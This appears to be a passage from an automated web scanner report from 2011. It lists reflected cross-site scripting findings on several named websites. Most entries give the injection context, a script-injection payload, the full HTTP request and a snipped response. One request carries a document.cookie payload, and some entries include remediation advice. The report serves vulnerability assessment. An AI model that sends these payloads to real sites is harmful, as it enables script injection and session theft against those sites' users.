This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /shows/A-Lista8c40"><script>alert(1)</script>23d9018f7a3 HTTP/1.1 Host: www.butterscotch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f0c8"-alert(1)-"39e9638a1ff was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /shows/A-List7f0c8"-alert(1)-"39e9638a1ff HTTP/1.1 Host: www.butterscotch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9be04'><script>alert(1)</script>43f8c6292e2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /shows/AT9be04'><script>alert(1)</script>43f8c6292e2 HTTP/1.1 Host: www.butterscotch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30613"-alert(1)-"94f0bdba78e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /shows/AT30613"-alert(1)-"94f0bdba78e HTTP/1.1 Host: www.butterscotch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 259d1"><script>alert(1)</script>966a5ade193 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /shows/AT259d1"><script>alert(1)</script>966a5ade193 HTTP/1.1 Host: www.butterscotch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1cdff'><script>alert(1)</script>7fc59e7282f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /shows/Lab-Rats1cdff'><script>alert(1)</script>7fc59e7282f HTTP/1.1 Host: www.butterscotch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 605d2"><script>alert(1)</script>0f550289d8e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /shows/Lab-Rats605d2"><script>alert(1)</script>0f550289d8e HTTP/1.1 Host: www.butterscotch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f862"-alert(1)-"b0c5dfc94b0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /shows/Lab-Rats2f862"-alert(1)-"b0c5dfc94b0 HTTP/1.1 Host: www.butterscotch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 86263'><script>alert(1)</script>484a3c8edc8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /shows/Miss-Download86263'><script>alert(1)</script>484a3c8edc8 HTTP/1.1 Host: www.butterscotch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26605"-alert(1)-"689bed10a7d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /shows/Miss-Download26605"-alert(1)-"689bed10a7d HTTP/1.1 Host: www.butterscotch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ddabd"><script>alert(1)</script>d590b6c1636 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /shows/Miss-Downloadddabd"><script>alert(1)</script>d590b6c1636 HTTP/1.1 Host: www.butterscotch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b7b6d'><script>alert(1)</script>031da9bdfb8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /shows/Mr-Mobileb7b6d'><script>alert(1)</script>031da9bdfb8 HTTP/1.1 Host: www.butterscotch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49459"><script>alert(1)</script>6537b84f503 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /shows/Mr-Mobile49459"><script>alert(1)</script>6537b84f503 HTTP/1.1 Host: www.butterscotch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bfea8"-alert(1)-"554ac61bd4e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /shows/Mr-Mobilebfea8"-alert(1)-"554ac61bd4e HTTP/1.1 Host: www.butterscotch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d5fe3'><script>alert(1)</script>2aec528306 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /shows/On-Deckd5fe3'><script>alert(1)</script>2aec528306 HTTP/1.1 Host: www.butterscotch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a2be"><script>alert(1)</script>0cc37f18b7a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /shows/On-Deck9a2be"><script>alert(1)</script>0cc37f18b7a HTTP/1.1 Host: www.butterscotch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7ab27"-alert(1)-"9bc82b719cd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /shows/On-Deck7ab27"-alert(1)-"9bc82b719cd HTTP/1.1 Host: www.butterscotch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b3d86'><script>alert(1)</script>b1ffded8566 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /shows/The-Noobb3d86'><script>alert(1)</script>b1ffded8566 HTTP/1.1 Host: www.butterscotch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 756bb"-alert(1)-"c84622db6bd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /shows/The-Noob756bb"-alert(1)-"c84622db6bd HTTP/1.1 Host: www.butterscotch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a634"><script>alert(1)</script>ec3897212c8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /shows/The-Noob3a634"><script>alert(1)</script>ec3897212c8 HTTP/1.1 Host: www.butterscotch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script> ...[SNIP]... <input type=hidden name=ref value="http://www.butterscotch.com/shows/The-Noob3a634"><script>alert(1)</script>ec3897212c8" /> ...[SNIP]...
3.107. http://www.butterscotch.com/tutorials.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.butterscotch.com
Path:
/tutorials.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d7c85'><script>alert(1)</script>bc9e9d0f84 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tutorials.html?d7c85'><script>alert(1)</script>bc9e9d0f84=1 HTTP/1.1 Host: www.butterscotch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script> ...[SNIP]... <input type='hidden' name='ref' value='/tutorials.html?d7c85'><script>alert(1)</script>bc9e9d0f84=1' /> ...[SNIP]...
3.108. http://www.butterscotch.com/tutorials.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.butterscotch.com
Path:
/tutorials.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c73a3"-alert(1)-"3ae1549e395 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tutorials.html?c73a3"-alert(1)-"3ae1549e395=1 HTTP/1.1 Host: www.butterscotch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 59ab9</title><script>alert(1)</script>4e54375ce26 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /reviews/59ab9</title><script>alert(1)</script>4e54375ce26/x22 HTTP/1.1 Host: www.buzzillions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 610a7<script>alert(1)</script>e398f29f414 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /reviews/610a7<script>alert(1)</script>e398f29f414/x22 HTTP/1.1 Host: www.buzzillions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c455e'%3balert(1)//fdc072ec141 was submitted in the REST URL parameter 2. This input was echoed as c455e';alert(1)//fdc072ec141 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /reviews/c455e'%3balert(1)//fdc072ec141/x22 HTTP/1.1 Host: www.buzzillions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 44a08'%3b28a34fbd60c was submitted in the REST URL parameter 2. This input was echoed as 44a08';28a34fbd60c in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /whois/smartdevil.com44a08'%3b28a34fbd60c/x22 HTTP/1.1 Host: www.ip-adress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:56:51 GMT Server: Apache Cache-Control: no-cache Expires: -1 Set-Cookie: isv=1; expires=Fri, 04-Feb-2011 21:56:51 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 13811
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset= ...[SNIP]... <span id="hostname">smartdevil.com44a08';28a34fbd60c </' + 'span> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4473"%20a%3db%2016a87f4d9f1 was submitted in the REST URL parameter 2. This input was echoed as c4473" a=b 16a87f4d9f1 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /find-jobs/All-Locationc4473"%20a%3db%2016a87f4d9f1/warehouse-openings-in-westland-michigan.html/x22 HTTP/1.1 Host: www.jobsyndicates.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:59:46 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.3.3 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 4385d0f17cf8fcee3ef445880de44c08=2d455231d6b3a9382ff7357e54908a71; path=/ Set-Cookie: ja_kyanite_ii_tpl=ja_kyanite_ii; expires=Tue, 24-Jan-2012 21:59:46 GMT; path=/ Last-Modified: Thu, 03 Feb 2011 21:59:46 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 25200
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
< ...[SNIP]... <meta name="description" content="Find warehouse openings in westland michigan.html jobs and career in All Locationc4473" a=b 16a87f4d9f1, displaying 1-15 results. Daily updates Job listing with multiple Rss feed, experience the best way to find a job online" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e162b"%3b450ee9e1714 was submitted in the REST URL parameter 2. This input was echoed as e162b";450ee9e1714 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /find-jobs/All-Locatione162b"%3b450ee9e1714/warehouse-openings-in-westland-michigan.html/x22 HTTP/1.1 Host: www.jobsyndicates.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:59:47 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.3.3 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 4385d0f17cf8fcee3ef445880de44c08=a7d5c6bff03ec5fc507b206bd2f58b86; path=/ Set-Cookie: ja_kyanite_ii_tpl=ja_kyanite_ii; expires=Tue, 24-Jan-2012 21:59:48 GMT; path=/ Last-Modified: Thu, 03 Feb 2011 21:59:48 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 25114
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 636d6"%20a%3db%201c410831e56 was submitted in the REST URL parameter 3. This input was echoed as 636d6" a=b 1c410831e56 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /find-jobs/All-Location/warehouse-openings-in-westland-michigan.html636d6"%20a%3db%201c410831e56/x22 HTTP/1.1 Host: www.jobsyndicates.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 22:00:04 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.3.3 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 4385d0f17cf8fcee3ef445880de44c08=60ddc87c66256906fadd1f2a484abc98; path=/ Set-Cookie: ja_kyanite_ii_tpl=ja_kyanite_ii; expires=Tue, 24-Jan-2012 22:00:04 GMT; path=/ Last-Modified: Thu, 03 Feb 2011 22:00:04 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 25218
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
< ...[SNIP]... <meta name="description" content="Find warehouse openings in westland michigan.html636d6" a=b 1c410831e56 jobs and career , displaying 1-15 results. Daily updates Job listing with multiple Rss feed, experience the best way to find a job online" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 11311"%3bb0138398545 was submitted in the REST URL parameter 3. This input was echoed as 11311";b0138398545 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /find-jobs/All-Location/warehouse-openings-in-westland-michigan.html11311"%3bb0138398545/x22 HTTP/1.1 Host: www.jobsyndicates.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 22:00:06 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.3.3 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 4385d0f17cf8fcee3ef445880de44c08=7377341cb25663e7e8ec2eb65cf84816; path=/ Set-Cookie: ja_kyanite_ii_tpl=ja_kyanite_ii; expires=Tue, 24-Jan-2012 22:00:06 GMT; path=/ Last-Modified: Thu, 03 Feb 2011 22:00:07 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 25126
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 73100<script>alert(1)</script>af671aace11 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /bsdlicense.txt73100<script>alert(1)</script>af671aace11 HTTP/1.1 Host: www.kminek.pl Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 22:00:42 GMT Server: Apache X-Pingback: http://www.kminek.pl/kminek-core/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: PHPSESSID=88d2jmcinjb18m98s7vavegus2; path=/ Set-Cookie: layoutbar=deleted; expires=Wed, 03-Feb-2010 22:00:41 GMT; path=/ Last-Modified: Thu, 03 Feb 2011 22:00:42 GMT Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 8327
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html dir="ltr" lang="pl-PL">
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d399a<script>alert(1)</script>179d88325a3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /d399a<script>alert(1)</script>179d88325a3 HTTP/1.1 Host: www.kminek.pl Proxy-Connection: keep-alive Referer: http://www.kminek.pl/bsdlicense.txt73100%3Cscript%3Ealert(document.cookie)%3C/script%3Eaf671aace11 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=g2rkdjbkf7e1cnmn1jpn3vrc76
Response
HTTP/1.1 404 Not Found Date: Fri, 04 Feb 2011 01:50:03 GMT Server: Apache X-Pingback: http://www.kminek.pl/kminek-core/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: layoutbar=deleted; expires=Thu, 04-Feb-2010 01:50:02 GMT; path=/ Last-Modified: Fri, 04 Feb 2011 01:50:03 GMT Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 8236
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html dir="ltr" lang="pl-PL">
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ee332<script>alert(1)</script>0b6fe74c897 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ee332<script>alert(1)</script>0b6fe74c897 HTTP/1.1 Host: www.kminek.pl Proxy-Connection: keep-alive Referer: http://www.kminek.pl/bsdlicense.txt73100%3Cscript%3Ealert(document.cookie)%3C/script%3Eaf671aace11 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=g2rkdjbkf7e1cnmn1jpn3vrc76
Response
HTTP/1.1 404 Not Found Date: Fri, 04 Feb 2011 01:50:18 GMT Server: Apache X-Pingback: http://www.kminek.pl/kminek-core/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: layoutbar=deleted; expires=Thu, 04-Feb-2010 01:50:17 GMT; path=/ Last-Modified: Fri, 04 Feb 2011 01:50:18 GMT Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 8236
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html dir="ltr" lang="pl-PL">
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 28728<script>alert(1)</script>812ffa424ab was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /lab/yetii28728<script>alert(1)</script>812ffa424ab/ HTTP/1.1 Host: www.kminek.pl Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 22:02:24 GMT Server: Apache X-Pingback: http://www.kminek.pl/kminek-core/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: PHPSESSID=spgj6939rjejseveijoefseot5; path=/ Set-Cookie: layoutbar=deleted; expires=Wed, 03-Feb-2010 22:02:23 GMT; path=/ Last-Modified: Thu, 03 Feb 2011 22:02:24 GMT Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 8323
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html dir="ltr" lang="pl-PL">
